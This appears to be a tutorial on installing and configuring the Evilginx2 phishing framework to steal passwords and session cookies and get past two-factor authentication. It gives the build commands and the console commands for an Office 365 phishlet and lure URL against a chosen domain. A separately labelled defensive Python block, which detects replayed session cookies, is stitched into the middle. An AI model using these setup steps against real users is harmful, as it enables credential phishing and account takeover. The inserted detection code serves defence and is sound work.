Evilginx is a man-in-the-middle attack framework used to phish passwords as well as session cookies, which can then be used to circumvent two-factor authentication.

Evilginx2 is considered a sophisticated tool because it can bypass two-factor authentication (2FA) and multi-factor authentication (MFA) mechanisms.

This is done by intercepting the user’s session after they have successfully logged in and then redirecting them to a fake page where their session is hijacked.

The framework uses phishlets to mimic a website such as Office 365, Citrix, or Netflix and deceive visitors into entering their credentials.

Because the project is open source, a number of community-contributed phishlets are ready to use.
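The session hijack described above leaves a trace in the application's own logs: a session cookie issued to the victim's IP is presented from a second IP shortly afterwards. As an added example (not from the page or the Evilginx project), the following Python flags that pattern; the log format, session IDs and IP addresses are constructed.

```python
"""Detect a session cookie replayed from a second source IP soon after login.
Added defensive example; log format and values below are constructed."""
from datetime import datetime, timedelta

# Constructed access-log sample: timestamp, session id, client IP, path.
# Session a1b2c3 is used from a second IP 40 seconds after login.
SAMPLE_LOGS = """\
2024-05-01T09:00:00Z sess=a1b2c3 ip=203.0.113.10 path=/login
2024-05-01T09:00:02Z sess=a1b2c3 ip=203.0.113.10 path=/home
2024-05-01T09:00:40Z sess=a1b2c3 ip=198.51.100.77 path=/mail
2024-05-01T10:15:00Z sess=d4e5f6 ip=203.0.113.22 path=/login
2024-05-01T10:16:00Z sess=d4e5f6 ip=203.0.113.22 path=/home
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, session, ip, path)."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), kv["sess"], kv["ip"], kv["path"]


def find_replayed_sessions(log_text, window=timedelta(minutes=5)):
    """Return (session, login_ip, new_ip, seconds_after_login) for each session
    whose cookie is presented from a different IP within `window` of its first use.
    Assumes the first line seen for a session is the legitimate login."""
    first_seen = {}  # session id -> (timestamp, ip) of first appearance
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, sess, ip, _path = parse_line(line)
        if sess not in first_seen:
            first_seen[sess] = (ts, ip)
            continue
        t0, ip0 = first_seen[sess]
        if ip != ip0 and ts - t0 <= window and sess not in flagged:
            flagged.add(sess)
            alerts.append((sess, ip0, ip, int((ts - t0).total_seconds())))
    return alerts


if __name__ == "__main__":
    for alert in find_replayed_sessions(SAMPLE_LOGS):
        print("possible session-token replay:", alert)
```

Legitimate IP changes (mobile networks, VPN reconnects) will also match, so treat the output as a triage signal to correlate with the IdP's sign-in records rather than a verdict.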

Requirements

  • Domain Name
  • VPS – Debian 10
  • IP Address

Install build dependencies

sudo apt update
sudo apt install wget git make -y

Install Go

wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
echo 'export PATH=/usr/local/go/bin:$PATH' | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh

Install Evilginx

git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install

Start Evilginx2

sudo evilginx

How to Configure Evilginx

config domain <yourdomain>
config ip <yourIP>
blacklist unauth

Phishlets

Phishlets are pre-configured modules within Evilginx designed to mimic specific websites and facilitate phishing attacks.

They essentially act as templates for creating customized phishing pages that closely resemble legitimate websites like banks, social media platforms, or email providers.

phishlets hostname o365 <yourdomain>
phishlets enable o365

Lures

Evilginx lures are essentially pre-generated phishing links designed to mimic legitimate websites and trick victims into entering their credentials.

They act as bait, luring unsuspecting individuals into the trap.

lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0

Evilginx offers a variety of pre-built phishlets targeting popular websites like Gmail, Facebook, and banking portals.

Additionally, we can create custom lures for more specific targets.